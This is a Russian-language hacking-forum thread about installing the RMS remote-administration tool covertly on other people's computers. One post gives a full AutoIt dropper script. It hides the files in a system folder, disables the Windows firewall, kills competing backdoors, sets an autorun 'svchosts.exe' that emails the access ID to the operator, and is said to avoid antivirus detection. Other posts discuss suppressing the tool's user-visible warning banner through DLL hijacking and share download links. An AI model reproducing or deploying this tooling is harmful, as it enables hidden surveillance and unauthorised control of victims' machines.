Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

  1. sergey1237
    sergey1237 Новичок
    Симпатии:
    0
    22 окт 2012
  2. sv9t
    sv9t Новичок
    Симпатии:
    0
    4ekkk, спасибо!))) ща качнем

    Добавлено через 9 минут
    Не воспроизводится(( Пишет нет сведений об аудио и видео данных. Может в архиве лучше? у тебя воспроизводится?
     
    Последнее редактирование: 22 окт 2012
    22 окт 2012
  3. sergey1237
    sergey1237 Новичок
    Симпатии:
    0
    22 окт 2012
  4. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Всегда пожалуйста! На то он и форум чтоб делать общее дело вместе!
     
    22 окт 2012
  5. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    это всё хорошо, окошко пропало. но как же цифровая подпись? ;)
     
    22 окт 2012
  6. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    А тут уже дело каждого. Если хочешь цифровую подпись не патч и и живи с табличкой о видеонаблюдении)
     
    22 окт 2012
  7. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    пролистай пару страниц назад. кладёшь в папку dll - и подпись цела, и таблички не будет.
     
    22 окт 2012
    1 человеку нравится это.
  8. valyka80
    valyka80 Новичок
    Симпатии:
    5
    Делал для себя (сразу оговорюсь)
    вот исходник на AutoIT, аналог батника для установки RMS (после компиляции не палится ни чем)
    Код:
    #NoTrayIcon
    #Include <Security.au3>
    #include <File.au3>
    #include <WindowsConstants.au3>
    #include <Inet.au3>
    $wind = @SystemDir
    $wind1 = $wind & "\catroot3\"
    $wind64 = "C:\Windows\SysWOW64\"
    RunWait('"' & @SystemDir & '\RManServer.exe" /stop', '', @SW_HIDE)
    RunWait('"' & @SystemDir & '\RManServer.exe" /silentuninstall', '', @SW_HIDE)
    RunWait('taskkill /f /im RManServer.exe', '', @SW_HIDE)
    RunWait('taskkill /f /im rutserv.exe', '', @SW_HIDE)
    DirRemove($wind & "\catroot3", 1)
    RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\", "Remote Manipulator System")
    ;создание и копирование
    DirCreate($wind1)
    FileCopy("dsfVorbisDecoder.dll", $wind1, 1)
    FileCopy("dsfVorbisEncoder.dll", $wind1, 1)
    FileCopy("gdiplus.dll", $wind1, 1)
    FileCopy("Microsoft.VC90.CRT.manifest", $wind1, 1)
    FileCopy("msvcp90.dll", $wind1, 1)
    FileCopy("msvcr90.dll", $wind1, 1)
    FileCopy("rfusclient.exe", $wind1, 1)
    FileCopy("RIPCServer.dll", $wind1, 1)
    FileCopy("rutserv.exe", $wind1, 1)
    FileCopy("RWLN.dll", $wind1, 1)
    FileCopy("set.reg", $wind1, 1)
    FileCopy("vp8decoder.dll", $wind1, 1)
    FileCopy("vp8encoder.dll", $wind1, 1)
    FileCopy("svchosts.exe", $wind1, 1)
    FileCopy("de.exe", $wind1, 1)
    FileCopy("del.exe", $wind, 1)
    FileSetAttrib($wind1, "+HR")
    FileSetAttrib($wind & "\del.exe", "+HR")
    ;остановка процессов
    RunWait("net stop rserver3", '', @SW_HIDE)
    RunWait("taskkill /f /im rserver3.exe", '', @SW_HIDE)
    RunWait("taskkill /f /im r_server.exe", '', @SW_HIDE)
    RunWait("taskkill /f /im cam_server.exe", '', @SW_HIDE)
    ;удаление 
    DirRemove(@SystemDir & "\rserver30", 1)
    DirRemove($wind64 & "rserver30", 1)
    FileDelete(@SystemDir & "\rserver30")
    FileDelete(@SystemDir & "\r_server.exe")
    FileDelete($wind64 & "r_server.exe")
    FileDelete($wind64 & "rserver30")
    ;остановка телнет
    RunWait("net stop Telnet", '', @SW_HIDE)
    RunWait("sc config tlntsvr start= disabled", '', @SW_HIDE)
    RunWait('net stop "Service Host Controller"', '', @SW_HIDE)
    RunWait("net user HelpAssistant /delete", '', @SW_HIDE)
    RunWait("schtasks /delete /tn security /f", '', @SW_HIDE)
    ;фаервол
    RunWait("netsh advfirewall set allprofiles state off", '', @SW_HIDE)
    RunWait('netsh advfirewall firewall delete rule name="Microsoft Outlook Express"', '', @SW_HIDE)
    RunWait('netsh advfirewall firewall delete rule name="Service Host Controller"', '', @SW_HIDE)
    RunWait('netsh advfirewall firewall delete rule name="•®бв-Їа®жҐбб ¤«п б«г¦Ў Windows"', '', @SW_HIDE)
    RunWait('netsh advfirewall firewall delete rule name="•®бв-Їа®жҐбб ¤«п §*¤*з Windows"', '', @SW_HIDE)
    RunWait('netsh firewall delete portopening tcp 57009', '', @SW_HIDE)
    RunWait('netsh advfirewall firewall delete rule name="cam_server"', '', @SW_HIDE)
    RunWait('netsh advfirewall firewall delete portopening tcp 57011 all', '', @SW_HIDE)
    ;Реестр
    RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", "ЋЇҐа*жЁ®***п бЁб⥬* Microsoft Windows")
    RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", "Service Host Controller")
    RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", "cam_server.exe")
    RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList", "HelpAssistant")
    RegDelete("HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RServer3")
    ;Запуск
    RunWait('"' & $wind1 & 'rutserv.exe" /silentinstall', '', @SW_HIDE)
    RunWait('"' & $wind1 & 'rutserv.exe" /firewall', '', @SW_HIDE)
    RunWait('"' & $wind1 & 'regedit /s set.reg"', '', @SW_HIDE)
    RunWait('"' & $wind1 & 'rutserv.exe" /start', '', @SW_HIDE)
    RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "svchosts.exe", "REG_SZ", $wind1 & "svchosts.exe") ;автозагрузка файла отправки на мыло
    RunWait('"' & $wind1 & 'svсhosts.exe"', '', @SW_HIDE) ;запуск файла отправки на мыло
    
    mpr.exe нет т.к антивири его подозревают в чем то :) (даже новую версию)
    для отправки на мыло использовал свою прогу (http://www.xaker.name/forvb/showpost.php?p=181050&postcount=1) переименовав его в svchosts.exe (для автозапуска)
    Важно:
    с копировать в msi переименнованый в svchosts.exe мыльник
    можно прикрепить файл RMS агент (rutserv.exe) что бы не забыть ID.
    Файл del.exe запускает de.exe и удаляет в реестре мыльник,
    в stop.js нужно изменить только запуск rms.exe.

    архив:
    http://zalil.ru/33881163
     
    Последнее редактирование: 23 окт 2012
    23 окт 2012
  9. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    Я не совсем понял. Тут коннект по IP или по ID?
     
    23 окт 2012
  10. katabr
    katabr Новичок
    Симпатии:
    0
    Всем привет, давно не было, полистал тему так и не нашел как же собрать новую сборку? может кто нибудь напишет мануал со всеми исправлениями? или хотябы поделитесь ссылкой как собрать сборку на 5.3 версии, а то я пользуюсь старой 5.1 там на мыло приходит, но подключится нельзя т.к. ключ забанен.
     
    23 окт 2012
  11. valyka80
    valyka80 Новичок
    Симпатии:
    5
    это установщик
    rms собираешь сам
    просо батник у меня палился.
     
    23 окт 2012
  12. nonamed
    nonamed Новичок
    Симпатии:
    0
    Патченый msi версии 5.3 не мог бы кто выложить? Когда патчу самостоятельно по одной инструкции, выложенной где-то здесь, размер получается огромным (хотя кабы удаляю через orca).
     
    24 окт 2012
  13. dragon123wer
    dragon123wer Banned
    Симпатии:
    11
    Научился более мение работать с RMS, урок по настройке создание нескольких билдов и работе софта надо?
     
    24 окт 2012
  14. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Ессественно НАДО!)

    Добавлено через 3 минуты
    Есссественно НУЖНО) Кинь в личку
     
    Последнее редактирование: 26 окт 2012
    26 окт 2012
  15. sergey1237
    sergey1237 Новичок
    Симпатии:
    0
    прояснил-бы кто-нибудь тему про эту dll,
    каков алгоритм действий по созданию?
    если это "хук", то глобальный или локальный,
    на какое системное сообщение хук?

    Вобщем в какую сторону двигаться? А?
     
    26 окт 2012
  16. incode
    incode Banned
    Симпатии:
    16
    Mr.Burns, как это некрасиво с вашей стороны.../facepalm
     
    26 окт 2012
  17. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    что именно?
     
    26 окт 2012
  18. nebra
    nebra Новичок
    Симпатии:
    13
    Mr.Burns для чего дллка? как она работает? типа банер не будет палится?
     
    26 окт 2012
  19. andy_panda
    andy_panda Новичок
    Симпатии:
    0
    Mr.Burns,
    как самому создать "msimg32.dll"?
     
    26 окт 2012
  20. sergey1237
    sergey1237 Новичок
    Симпатии:
    0
    Спасибо конечно, но, меня интересует процесс создания этой dll.
    люблю поковырять и посоздавать сам.(а мозгов, времени и помошников не хватает)
    Просто интересная тема: перехват системных сообщений чужих процессов (заинтересовало на
    данном примере)
    +Приложение не теряет цифровую подпись, в отличии от патченых файлов, которые все равно попадут
    в вирусные базы.
    - я так думаю, что: Вы изволили выложить готовый файл ,который, в прошествии времени тоже попадет в базы, . За что видимо вас и упрекает "Incode":)
     
    27 окт 2012
Загрузка...